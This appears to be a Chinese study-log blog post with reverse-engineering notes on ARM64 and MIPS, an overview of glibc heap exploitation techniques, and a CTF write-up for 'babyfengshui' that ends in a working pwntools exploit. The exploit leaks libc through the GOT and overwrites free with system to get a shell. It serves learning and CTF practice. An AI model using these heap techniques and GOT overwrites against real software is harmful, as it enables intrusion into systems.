学习打卡4:堆漏洞的利用技术与技巧与堆风水学习

2024-03-12 12:59

本文主要是介绍学习打卡4:堆漏洞的利用技术与技巧与堆风水学习,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

督促自己:2020-9-10

学习记录:

《逆向工程权威指南》上

ARM64

ARM64的CPU中可能运行于ARM模式,不可能运行于 Thmub 或者 Thmub-2 moshi ,所以它必须使用32位指令。

  • STP(Store Pair) 指令是把寄存器的值存储到内存中的任意地址,明确是sp寄存器时,是存储在栈中。
  • 感叹号标志意味着其标注的运算会被优先执行。(这属于“预索引/pre-index”指令,对应“延迟索引/post-index”指令)
  • 在ARM64中,X29寄存器时帧指针,X30起着LR的作用,所以在函数序言和尾声成对出现。
  • W0是X0寄存器的低32位
mov x0, #0x0            //#0
  • 此处这条指令没有感叹号标记,意味着它将进行赋值操作,再把sp的值与16进行求和运算。------延时索引(post-index)指令

  • RET指令(返回指令)与BX LR作用相同,但是是按照寄存器的名称进行跳转的(默认使用X30寄存器指向的地址)

MIPS

全局指针 Globle Pointer :MIPS重要概念

每条MIPS指令都是32位的指令,所以单条指令无法容纳32位地址(指针)。这种情况下MIPS就得传递一对指令才能使用一个完整的指针。

**概念:**为了简化静态数据的访问操作,MIPS平台特地为此保留了一个专用的寄存器,并且把常用数据分配到了一个大小为64KB的内存数据空间中,这种专用的寄存器就叫做:‘全局指针’寄存器。

它的值是一个指针,指向64KB(静态)数据空间的正中间。而这64KB空间通常用于存储全局变量,以及printf()这类由外部导入的的外部函数地址。

在ELF格式的文件中,这个64KB的静态数据位于.sbss和.sdata之中。".sbss”是small BSS(Block Started by
Symbol)的缩写,用于存储非初始化的数据。".sdata”是small data的缩写,用于存储有初始化数值的数据。

根据这种数据布局编程人员可以自行决定把需要快速访问的数据放在.sdata、还是.sbss数据段中。

  • GP寄存器:全局指针寄存器

在这里插入图片描述

  • 初始化呢全局指正寄存器GP寄存器的值,并将其指向64KB数据段的正中央。

  • LW政令(Load Word):加载指令。

  • LUI :Load Upper Immediate

  • ADDIU : Add Immediate Unsigned Word

  • JALR : Jump and Link Register

  • MIPS有一个常量寄存器$0寄存器提供数值0的机制,$0里面的值是常量0。

    在MIPS系统中,没有在寄存器之间复制数值的(硬件)指令。
    MOVE DST , SRC 指令是通过加法指令ADD DST , SRC, $ZERO变相实现的,即等效:DST = SRC + 0

  • “T-”开头的寄存器叫做“临时”寄存器,同于保存代码里的临时值。

  • MIPS和其他的一些硬件平台的指令集都没有单独的NOP指令。

    NOP的显示:在IDA中,IDA并不会自动把实际指令匹配为NOP指令,所有一般是“OR $AT , $ZERO”形式,表面上看,它将保留寄存器 $AT 的值与0进行或运算,但从本质上讲,就是发给CPU的NOP指令。

堆风水

堆风水也叫作堆排布 ,就是根据堆分配机制,将特定的内存块分配到特定的位置去,在一些其他漏洞的利用中起到效果。 堆排布几乎是所有堆漏洞利用所必需的技能,需要对glibc内存管理策略非常熟悉。

堆漏洞的利用思想:

  • 破坏堆内存管理的相关数据结构:如arena、bin、chunk
  • 破坏堆内存中的用户数据:覆盖变量指针、函数指针、数据等
  • 一般情况下都是为了构造任意内存读写以及控制流劫持

堆漏洞的防护方法:

  • 保护堆内存管理相关的数据结构:Heap Canary
  • 保护堆内存中的用户数据:CFI, Vtable protect
  • 通用防护:ASLR, DEP

堆漏洞的利用技术与技巧:

  • Use After Free & Double Free

    • Dangling pointer

      指向被释放的内存的指针,通常是由于释放内存后未将指针置null

    • Use After Free

      对Dangling pointer所指向内存进行use。

    UAF的利用思路:想办法将Dangling pointer指向的内存重新分配回来,且尽可能的使该内存中的内容可控(如重新分配为字符串)。如果use的方式是打印*(Dangling pointer+8),那就会产生任意地址读,如果use方式是将*(Dangling pointer+12)作为函数指针进行调用,那就可以劫持控制流.  
    
    • Double Free

      UAF中的use为再次free,是一种特殊的UAF,且可转换为普通的UAF转换:free§,p2=malloc(),p2与p指向同一个内存free§,p2为Dangling pointer=>UAF

  • Heap Overflow

    • Overflow directly

      直接覆盖相邻堆块的内存的内容

    关键:如何让想被覆盖的堆块正好在具有溢出漏洞的堆块之后
    
    • Fast bin attack

      改写fastbin单向链表中的fd,那再次分配就会分配到被改写的fd指向的地址

      改写目标必须有一个正确的size对应,否则会挂。 另外还有:House of Spirit

    • Unsorted bin attack

    当需要分配的内存无法在fastbin或者smallbin找到时,glibc会从unsort bins的链表头的bk开始遍历,遍历过程中会把unsortbin中的块加入合适的smallbin/largebin中,如果找到合适大小内存块则会返回。

    利用思路:通过堆溢出覆盖victim->bk为要写入的地址- 4,再次分配时bck->fd = unsorted_chunks (av)会触发一个任意地址写。写入的内容是libc中的一个地址。只不过此时unsortedbin被破坏,再次分配代码会崩掉,所以要谨慎考虑写入的地址,通常可以改写global_max_fast,从而导致接下来所有分配都是在libc进行。通过堆溢出覆盖victim->bk为一个size为x的fake chunk,再次分配unsorted_chunks (av)-> bk = bck会改写unsortedbin链表头的bk,此时再分配 x-4 大小的内存即可返回fakechunkOverwrite Topchunk
    
    • House of Force

      Bin中没有任何合适的内存时会从topchunk分配内存:if(topchunk->size > alloc_size) {victim = topchunk; topchunk = topchunk - alloc_size; return victim;}
      改写topchunk的size为一个很大的数,如0xffffffff,分配alloc_size - 4大小的内存。由于alloc_size可控,所以此时topchunk位置可控,再次分配即可分配到想分配的位置
      需要预先泄露topchunk的地址Classical&Modern Unlink Attack
      
    • unlink

      当free(mem)调用时,如果与mem相邻的块是空闲的,则会将其从空闲链表中拿(unlink)下来并与mem合并。

        #define unlink(P, BK, FD) {BK = p->bk;FD = P->fd;FD->bk = BK;BK->fd = FD;}
      
      • Classical Unlink Attack

        如果通过heapoverflow将 P->bk 以及 P->fd 覆盖为攻击者可控制的地址,那`FD->bk = BK; BK->fd = FD; => P->fd->bk = P->bk; P->bk->fd = P->fd;` 造成任意写。不管要求(要写的内容+4)或者(要写的内容+8)。必须可写,否则会崩。但已不可用,现代glibc已有此检查:`P->fd->bk == P&&P->bk->fd == P`
        
    • Modern Unlink Attack

      找一个pointer X, *X=P, Overflow P->bk = X-4; P->fd = X-8
      P->bk->fd == X-4->fd == P, P->fd->bk == X-8->bk == P
      Unlink可得到 *P=X,此时可通过P修改X,如果X是数据指针则可能造成任意地址读写
      
    • Off by null

      溢出位数为1的溢出漏洞

    • Other techniques

      溢出位数为1且溢出内容为null的溢出漏洞

      在glibc中,如果攻击者可以控制malloc的大小和malloc与free的时机,堆中的off by one和off by null是可用的,通常可用构造出UAF,进而构造出任意地址读写&控制流劫持。主要利用思想:改写下一个chunk的chunk size(including inuse bit)
      
  • General exploit techniques

    • Heap fengshui
    高级堆排布技术:Heap fengshui动机:真实漏洞在利用的时候,堆是混乱的,因为存在漏洞的服务可能已经服务过很多用户,在触发漏洞时无法预计堆已经做了多少次malloc,多少次free。Heap fengshui可以让堆从混乱状态转换为确定状态不同的内存管理策略对应的heap fengshui的方法不同,例如:For glibc fastbin:把每种可能的大小都分配好多次。
    
    • Heap spray
    堆喷:不断分配内存,并填充(大量0x0c)+shellcode,直到0x0c0c0c0c内存地址被分配,多用于脚本语言漏洞的利用。大多数内存地址的值都是0x0c0c0c0c,0x0c0c0c0c地址也是0x0c slide+shellcode可以用其绕过ASLR,控制流劫持(jmp addr/jmp *addr)时,只要addr是喷过地址都可以执行shellcode,注意\*addr = 0x0c0c0c0c \*\*addr = 0x0c0c0c0c ***addr = 0x0c0c0c,必须在NX关闭时才能直接利用heap spray劫持控制流。
    
    • Exploit mmap chunk
    mmaped chunk:当malloc的块的大小大于128KB时,glibc会直接mmap内存。如果mmap的内存将整个binary的地址空间全部覆盖,我们就可以轻松拿到与任意地址相邻的堆地址,ASLR就失去了意义。适用于没有限制分配内存大小的问题。
    

题目:

babyfengshui
在这里插入图片描述

32位程序,没有开PIE
在这里插入图片描述
Add函数中可以看出,user结构体:

struct User{char *description;大小自己定char name[124];
};

堆结构大概为:

###################################################
# description                                     #
#                                                 #
#                                                 #
#                                                 #
###################################################
###################################################
# 指向description 指针#   name                      #
#####################                             #
#                                                 #
#                                                 #
###################################################

Update函数:
在这里插入图片描述

也就是说你第一次输入的description或者修改的description的长度不能达到箭头处:

 #################################################### description                                     ##                                                 ##                                                 ##                                                 #######################################################################################################
→# 指向description 指针#   name                      ######################                             ##                                                 ##                                                 ####################################################

看起来好像没啥问题,但不要因为这两个堆块是连续分配的,就先入为主的认为这两个堆块是连续的!

这种检查方式是有问题的,它基于 description 正好位于 user 前面这种设定。根据我们对堆分配器的理解,这个设定不一定成立,它们之间可能会包含其他已分配的堆块,从而绕过检查。

其他函数没有什么问题。

漏洞利用:

我们首先添加两个 user,用于绕过检查。第 3 个 user 存放 “/bin/sh”。然后删掉第 1 个 user,并创建一个 description 很长的 user,其长度是第 1 个 user 的 description 长度加上 user 结构体长度。这时候检查就绕过了,我们可以在添加新 user 的时候修改 description 大小,造成堆溢出,并修改第 2 个 user 的 user->desc 为 free@got.plt,从而泄漏出 libc 地址。得到 system 地址后,此时修改第 2 个 user 的 description,其实是修改 free 的 GOT,所以我们将其改成 system@got.plt。最后删除第 3 个 user,触发 system(’/bin/sh’),得到 shell。

exp:
#!/usr/bin/env pythonfrom pwn import *#context.log_level = 'debug'p = process(['./babyfengshui'], env={'LD_PRELOAD':'./libc-2.19.so'})
elf = ELF('babyfengshui')
libc = ELF('libc-2.19.so')def add_user(size, length, text):p.sendlineafter("Action: ", '0')p.sendlineafter("description: ", str(size))p.sendlineafter("name: ", 'AAAA')p.sendlineafter("length: ", str(length))p.sendlineafter("text: ", text)def delete_user(idx):p.sendlineafter("Action: ", '1')p.sendlineafter("index: ", str(idx))def display_user(idx):p.sendlineafter("Action: ", '2')p.sendlineafter("index: ", str(idx))def update_desc(idx, length, text):p.sendlineafter("Action: ", '3')p.sendlineafter("index: ", str(idx))p.sendlineafter("length: ", str(length))p.sendlineafter("text: ", text)if __name__ == "__main__":add_user(0x80, 0x80, 'AAAA')        # 0add_user(0x80, 0x80, 'AAAA')        # 1add_user(0x8, 0x8, '/bin/sh\x00')   # 2delete_user(0)add_user(0x100, 0x19c, "A"*0x198 + p32(elf.got['free']))    # 0display_user(1)p.recvuntil("description: ")free_addr = u32(p.recvn(4))system_addr = free_addr - (libc.symbols['free'] - libc.symbols['system'])log.info("system address: 0x%x" % system_addr)update_desc(1, 0x4, p32(system_addr))delete_user(2)p.interactive()

参考文献:

https://blog.csdn.net/breeze_cat/article/details/103788631

http://www.peckerwood.top/post/adword_babyfengshui/

 

明日任务:《逆向工程权威指南》上第四章,kernel base。

这篇关于学习打卡4:堆漏洞的利用技术与技巧与堆风水学习的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/801336

相关文章

Java字符串操作技巧之语法、示例与应用场景分析

《Java字符串操作技巧之语法、示例与应用场景分析》在Java算法题和日常开发中,字符串处理是必备的核心技能,本文全面梳理Java中字符串的常用操作语法,结合代码示例、应用场景和避坑指南,可快速掌握字... 目录引言1. 基础操作1.1 创建字符串1.2 获取长度1.3 访问字符2. 字符串处理2.1 子字

Java Optional的使用技巧与最佳实践

《JavaOptional的使用技巧与最佳实践》在Java中,Optional是用于优雅处理null的容器类,其核心目标是显式提醒开发者处理空值场景,避免NullPointerExce... 目录一、Optional 的核心用途二、使用技巧与最佳实践三、常见误区与反模式四、替代方案与扩展五、总结在 Java

Python通过模块化开发优化代码的技巧分享

《Python通过模块化开发优化代码的技巧分享》模块化开发就是把代码拆成一个个“零件”,该封装封装,该拆分拆分,下面小编就来和大家简单聊聊python如何用模块化开发进行代码优化吧... 目录什么是模块化开发如何拆分代码改进版:拆分成模块让模块更强大:使用 __init__.py你一定会遇到的问题模www.

SpringBoot3实现Gzip压缩优化的技术指南

《SpringBoot3实现Gzip压缩优化的技术指南》随着Web应用的用户量和数据量增加,网络带宽和页面加载速度逐渐成为瓶颈,为了减少数据传输量,提高用户体验,我们可以使用Gzip压缩HTTP响应,... 目录1、简述2、配置2.1 添加依赖2.2 配置 Gzip 压缩3、服务端应用4、前端应用4.1 N

MyBatis 动态 SQL 优化之标签的实战与技巧(常见用法)

《MyBatis动态SQL优化之标签的实战与技巧(常见用法)》本文通过详细的示例和实际应用场景,介绍了如何有效利用这些标签来优化MyBatis配置,提升开发效率,确保SQL的高效执行和安全性,感... 目录动态SQL详解一、动态SQL的核心概念1.1 什么是动态SQL?1.2 动态SQL的优点1.3 动态S

Java利用JSONPath操作JSON数据的技术指南

《Java利用JSONPath操作JSON数据的技术指南》JSONPath是一种强大的工具,用于查询和操作JSON数据,类似于SQL的语法,它为处理复杂的JSON数据结构提供了简单且高效... 目录1、简述2、什么是 jsONPath?3、Java 示例3.1 基本查询3.2 过滤查询3.3 递归搜索3.4

Python中随机休眠技术原理与应用详解

《Python中随机休眠技术原理与应用详解》在编程中,让程序暂停执行特定时间是常见需求,当需要引入不确定性时,随机休眠就成为关键技巧,下面我们就来看看Python中随机休眠技术的具体实现与应用吧... 目录引言一、实现原理与基础方法1.1 核心函数解析1.2 基础实现模板1.3 整数版实现二、典型应用场景2

电脑win32spl.dll文件丢失咋办? win32spl.dll丢失无法连接打印机修复技巧

《电脑win32spl.dll文件丢失咋办?win32spl.dll丢失无法连接打印机修复技巧》电脑突然提示win32spl.dll文件丢失,打印机死活连不上,今天就来给大家详细讲解一下这个问题的解... 不知道大家在使用电脑的时候是否遇到过关于win32spl.dll文件丢失的问题,win32spl.dl

电脑报错cxcore100.dll丢失怎么办? 多种免费修复缺失的cxcore100.dll文件的技巧

《电脑报错cxcore100.dll丢失怎么办?多种免费修复缺失的cxcore100.dll文件的技巧》你是否也遇到过“由于找不到cxcore100.dll,无法继续执行代码,重新安装程序可能会解... 当电脑报错“cxcore100.dll未找到”时,这通常意味着系统无法找到或加载这编程个必要的动态链接库

Java进阶学习之如何开启远程调式

《Java进阶学习之如何开启远程调式》Java开发中的远程调试是一项至关重要的技能,特别是在处理生产环境的问题或者协作开发时,:本文主要介绍Java进阶学习之如何开启远程调式的相关资料,需要的朋友... 目录概述Java远程调试的开启与底层原理开启Java远程调试底层原理JVM参数总结&nbsMbKKXJx